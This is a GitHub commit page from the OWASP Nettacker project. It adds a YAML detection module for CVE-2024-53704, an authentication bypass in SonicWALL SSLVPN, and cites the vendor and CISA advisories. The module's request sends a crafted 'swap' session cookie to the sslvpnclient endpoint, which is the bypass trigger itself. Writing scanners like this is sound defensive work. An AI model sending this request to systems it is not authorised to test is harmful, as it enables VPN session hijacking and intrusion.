-
-
Notifications
You must be signed in to change notification settings - Fork 819
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
adding SonicWALL SSLVPN CVE-2024-53704 module (#1018)
* Update paloalto_panos_cve_2025_0108.yaml added cisa_kev Adding cisa_kev profile to the module: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has just added this CVE-2025-0108 impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. * adding sonicwall_sslvpn_cve_2024_53704_vuln module
- Loading branch information
1 parent
2456cd1
commit 626a765
Showing
2 changed files
with
59 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
58 changes: 58 additions & 0 deletions
58
nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
info: | ||
name: sonicwall_sslvpn_cve_2024_53704_vuln | ||
author: OWASP Nettacker team | ||
severity: 8.2 | ||
description: CVE-2024-53704 Is an Improper Authentication vulnerability in the SonicWALL SSLVPN authentication mechanism which allows a remote attacker to bypass authentication. | ||
reference: | ||
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003 | ||
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking | ||
- https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog | ||
profiles: | ||
- vuln | ||
- vulnerability | ||
- http | ||
- high_severity | ||
- cve | ||
- sonicwall | ||
- cisa_kev | ||
|
||
|
||
payloads: | ||
- library: http | ||
steps: | ||
- method: get | ||
timeout: 3 | ||
headers: | ||
Host: "{target}" | ||
User-Agent: "{user_agent}" | ||
Cookie: 'swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=' | ||
allow_redirects: false | ||
ssl: false | ||
url: | ||
nettacker_fuzzer: | ||
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}" | ||
prefix: "" | ||
suffix: "" | ||
interceptors: | ||
data: | ||
paths: | ||
- "cgi-bin/sslvpnclient?launchplatform=" | ||
schema: | ||
- "https" | ||
ports: | ||
- 443 | ||
- 4433 | ||
- 4443 | ||
response: | ||
condition_type: and | ||
conditions: | ||
status_code: | ||
regex: "200" | ||
reverse: false | ||
header: | ||
Server: | ||
regex: 'SonicWALL SSLVPN Web Server' | ||
reverse: false | ||
content: | ||
regex: 'NELaunchX1' | ||
reverse: false |